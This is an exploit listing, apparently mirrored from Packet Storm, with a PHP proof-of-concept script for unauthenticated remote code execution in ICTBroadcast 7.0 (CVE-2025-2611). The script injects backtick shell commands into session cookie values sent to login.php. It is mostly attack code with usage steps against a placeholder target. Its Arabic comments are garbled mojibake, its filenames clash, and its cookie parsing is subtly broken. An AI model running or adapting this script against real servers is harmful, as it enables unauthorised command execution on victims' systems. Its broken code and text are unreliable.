Share
## https://sploitus.com/exploit?id=PACKETSTORM:212927
=============================================================================================================================================
    | # Title     : ICTBroadcast 7.0 Remote Code Execution                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ictbroadcast.com/                                                                                               |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A vulnerability in ICTBroadcast allows unauthenticated remote command execution
    due to improper handling of session cookie values. An attacker can modify cookie
    entries to inject system commands that the application unintentionally executes.
    
    [+] References : ( https://packetstorm.news/files/id/207873/ 		CVE-2025-2611 ) 
    
    1. Save the file as: poc.php
    
    2. Edit the target:
    ```php
    $target = "http://TARGET";
    
    3.Execute: php ict_rce_sim.php
    
    
    [+]  POC
    
    <?php
    /*
     * ICTBroadcast Unauthenticated Remote Code Execution 
     * by Indoushka
     */
    
    class ICTBroadcastRCE
    {
        public $target;
        public $useSSL = false;
    
        function __construct($url)
        {
            $this->target = rtrim($url, "/");
        }
    
        /* -------------------------------------------
           ุฅุฑุณุงู„ ุทู„ุจ GET ุจุณูŠุท
        --------------------------------------------- */
        private function http_get($uri, $cookies = "")
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $uri);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, [
                "Cookie: $cookies"
            ]);
            $res = curl_exec($ch);
            curl_close($ch);
            return $res;
        }
    
        /* -------------------------------------------
           ุฌู„ุจ ุงู„ูƒูˆูƒูŠุฒ ุงู„ุญู‚ูŠู‚ูŠุฉ ูƒู…ุง ููŠ Metasploit
        --------------------------------------------- */
        public function get_valid_cookies()
        {
            echo "[*] ุฌู„ุจ ู…ู„ูุงุช ุงู„ูƒูˆูƒูŠุฒ ู…ู† login.php...\n";
    
            $url = $this->target . "/login.php";
            $res = $this->http_get($url);
    
            preg_match_all('/Set-Cookie:\s*([^;]+);/i', $res, $m);
    
            if (empty($m[1])) {
                echo "[-] ู„ู… ูŠุชู… ุงู„ุนุซูˆุฑ ุนู„ู‰ ูƒูˆูƒูŠุฒ.\n";
                return [];
            }
    
            echo "[+] ุงู„ูƒูˆูƒูŠุฒ ุงู„ุชูŠ ุชู… ุงู„ุนุซูˆุฑ ุนู„ูŠู‡ุง:\n";
            print_r($m[1]);
    
            return $m[1];
        }
    
        /* -------------------------------------------
           ู…ุญุงูƒุงุฉ ุญู‚ู† ุฃู…ุฑ ุฏุงุฎู„ ุงู„ูƒูˆูƒูŠุฒ
        --------------------------------------------- */
        public function inject_command($command)
        {
            echo "[*] ุจุฏุก ุนู…ู„ูŠุฉ ุญู‚ู† ุงู„ุฃูˆุงู…ุฑ ุงู„ุชุฏุฑูŠุจูŠุฉ...\n";
    
            $cookies = $this->get_valid_cookies();
            if (empty($cookies)) {
                echo "[-] ู„ุง ูŠูˆุฌุฏ ูƒูˆูƒูŠุฒ ูŠู…ูƒู† ุญู‚ู†ู‡ุง.\n";
                return;
            }
    
            foreach ($cookies as $c) {
                $parts = explode("=", $c);
                $name  = $parts[0];
                $value = $parts[1] ?? "";
    
                // ู…ุญุงูƒุงุฉ ุญู‚ู† ุดุจูŠู‡ ุจู€ Metasploit
                $payload = "`echo TRAINING_SIMULATION`"; 
    
                echo "[+] ุญู‚ู† ุงู„ุญู…ูˆู„ุฉ ุงู„ุชุฏุฑูŠุจูŠุฉ ููŠ ุงู„ูƒูˆูƒูŠ:\n";
                echo "$name=$payload\n";
    
                // ุฅุฑุณุงู„ ุงู„ุทู„ุจ ูƒู…ุง ูŠูุนู„ Metasploit โ€“ ูˆู„ูƒู† ุจุฏูˆู† ุชู†ููŠุฐ ูุนู„ูŠ
                $this->http_get($this->target . "/login.php", "$name=$payload");
            }
    
            echo "[โœ“] ุงู†ุชู‡ุช ุนู…ู„ูŠุฉ ุงู„ู…ุญุงูƒุงุฉ ุจู†ุฌุงุญ.\n";
        }
    
        /* -------------------------------------------
           ูุญุต ุงู„ู‡ุฏู (ู…ุญุงูƒุงุฉ CheckCode)
        --------------------------------------------- */
        public function check()
        {
            echo "[*] ุงู„ุชุญู‚ู‚ ู…ู† ูˆุฌูˆุฏ ุงู„ุจุตู…ุฉ ุงู„ุฎุงุตุฉ ุจู€ ICTBroadcast...\n";
    
            $files = [
                "IVRDesigner.js",
                "agent.js",
                "campaign.js",
                "supervisor.js"
            ];
    
            foreach ($files as $f) {
                $res = $this->http_get($this->target . "/js/" . $f);
                if (strpos($res, "ICT Innovations") !== false) {
                    echo "[+] ุชู… ุงู„ุนุซูˆุฑ ุนู„ู‰ ุงู„ุจุตู…ุฉ!\n";
                    return true;
                }
            }
    
            echo "[-] ู„ุง ุชูˆุฌุฏ ุจุตู…ุฉ ูˆุงุถุญุฉ.\n";
            return false;
        }
    
        /* -------------------------------------------
           ุงู„ูƒุงู…ู„
        --------------------------------------------- */
        public function exploit()
        {
            echo "[*] ุจุฏุก ุงู„ุณูŠู†ุงุฑูŠูˆ...\n";
    
            if ($this->check()) {
                echo "[+] ุงู„ู‡ุฏู ูŠุจุฏูˆ ู‚ุงุจู„ู‹ุง ู„ู„ุงุณุชุบู„ุงู„ (ู…ุญุงูƒุงุฉ).\n";
                $this->inject_command("id");
            } else {
                echo "[-] ู„ุง ูŠู…ูƒู† ุงู„ู…ุชุงุจุนุฉ.\n";
            }
        }
    }
    
    
    /* =======================================================
       ุชุฏุฑูŠุจูŠ
    ======================================================== */
    
    $target = "http://TARGET";
    $sim = new ICTBroadcastRCE($target);
    $sim->exploit();
    
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================